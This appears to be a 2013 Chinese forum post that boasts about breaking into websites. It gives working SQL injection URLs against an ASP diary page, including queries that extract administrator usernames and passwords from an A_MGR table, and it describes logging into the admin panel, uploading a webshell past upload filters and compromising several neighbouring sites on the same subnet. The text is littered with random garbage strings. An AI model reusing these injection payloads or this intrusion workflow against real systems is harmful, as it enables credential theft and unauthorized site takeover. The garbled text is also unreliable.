发现一个注入点
' [) o- P" _& p/ _2 L6 ohttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
' U* H M' N, a& O
$ E% k5 g( F; S: ]* i/ R2 @习惯性的加’having1=1--
\$ r/ D) Y' ?- }5 H0 j8 \6 h& X" Q' x# m( c4 g
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—- h) y# k( F( S2 }
; X: F7 y* N- [! U0
6 `* Y' |$ t) P& O5 N6 Q
4 w) s& ^, C5 e6 e+ X7 s; E爆出Diary_A.dl_Title(这时候很激动啊)
1 o7 Z# \- x4 b. `# L: ?- O3 ?1 |4 Q# f% {5 Q! v3 e2 F
那么继续
. Q7 ~ _4 Z ?" O fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—. y: u/ B# Y% P$ p
* m9 o6 j( P6 |/ I% {+ E继续,一直爆下去& c6 @( \9 Q1 G* p
/ c/ U& {0 d1 L% o* j V爆到几个字段和表段 但是没找到需要的管理用户的字段
/ K4 S3 E! w% y
0 {8 F, ]7 Y: m. X0 M- L+ z1 k" R蛋疼了 怎么办 然后去后台登陆页看源码
3 Q# i9 B+ u; e" G$ X7 X$ J
' ` i8 w5 ~+ _: i0 R `# L6 z0& c7 S5 j4 @- G1 }
) ~ u: n0 s$ N) J0 z0 s) KInput name= “ADUID”
# m2 X. x0 C$ \# RInput name= “ADPWD”: A3 z& @* W; @9 @7 e3 E$ t
- v% g4 |% w& r6 S6 f
很幸运 找到了字段那就继续, \/ w/ F+ k0 ?9 p
找到之后开始爆用户
2 r; e+ q) V w5 U$ ihttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
1 Y) v% B1 Z5 R$ p4 E/ `爆密码) M8 u1 v, s" R! Z1 E" M2 j
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—7 T# o" y* S" G7 T+ n! Q
测试了下 这个注入点只能爆到文章哪里的表 5 A2 F$ s @# |& K
, w3 K! {1 u- R
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了6 @- r! x* {$ |# G* E
" s8 S9 }6 X) ]3 `0 G, M2 W又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了; G/ | Y( C0 C* p" U, a
: A1 m! g* @9 N; q4734 D6 R6 }' g- u9 q( k1 e5 t
+ P# U9 u }6 j7 ]# l8 k# a7 h进后台* x1 l9 a4 P& z7 R
* R: ~ v9 n. q# d& O9 D6 C; c: d n- F
发现几个上传点 有的地方不能上传 而且防止恶意代码/ C+ f- o# P' U# z3 S
7 H( k2 R) p- J4 M
没办法 各种百度各种找大牛 找到一只好像可以突破的马+ P; }* O, o2 B. u
1 ^, W7 z, Z0 l. X
+ v w. l/ {5 D" S$ Y
在系统管理那里直接上传 不过没有显示地址
6 A% [" L& u1 ~0 F" @
6 A" ~. u9 w# K0 }8 t# K$ Z4 P再上传一次 抓包 搞定OK6 [" a" B' p4 |
: H$ {# l0 d0 _" Z+ J
4 s, ^" `- Y" |& ]- ^. @1 f
2 D2 t: g# g: S/ R! F472
% f, H2 Q) a6 k: w1 g0 D M- L9 w% D2 N% |; {! K! |
晚上不行了 去睡觉。。。3 a, k) a5 S0 ?6 U. M$ }) o
第二天刚起床 闲的没事做继续日站吧
5 W' ]7 O/ c6 `1 j- M2 x3 f4 ^! |- x4 { I9 ?
找个站 就把这个站的旁c扫了下0 d4 o6 B0 T; H _* E
* o# u: m+ b5 T3 l% H
发现c段也有一个购物站 ,然后还和这个站的模板差不多
) s( _5 e/ ^' x" b/ P$ D [
) F& P5 Z- U8 l9 X" O+ D就找到会员登录口测试
% g' S6 U B9 e$ }, Y: B. Y
* q. Y9 O1 a( d2 K$ O, R8 G1 \0 H'and (select top 1 MGR_UID from A_MGR)>0—
+ r: k2 z7 g0 V ~. A7 K! p J. N果断爆到了 这时候我很激动 通杀
, H8 x2 m# B1 V+ h: S. E V! }; h1 s0 K& ]/ E
再次翻c段8 I! h. q0 X' ? h. G
r. x7 |+ x% @5 A5 s+ ]& M
翻出几个站 都成功拿下0 v' _8 \. t' O7 Q. s/ M9 l! `
3 S8 e4 @. j0 \# i( Y
5 p& o q i q5 I
$ H& {2 V0 v) c1 G/ U+ |2 [ C修复方案:
5 {6 l7 _8 A% @2 z' i& f& N3 q他们比我专业 7 y# u2 s% g/ p9 S) J; d
5 Y/ U8 w n) `8 b. t
; M) j" S5 O: b8 T/ ]2 f1 P/ z& E
- a: v. r$ g0 \4 v6 y% Y8 ^ |
发表于 2013-4-4 17:40:38
收藏
支持
反对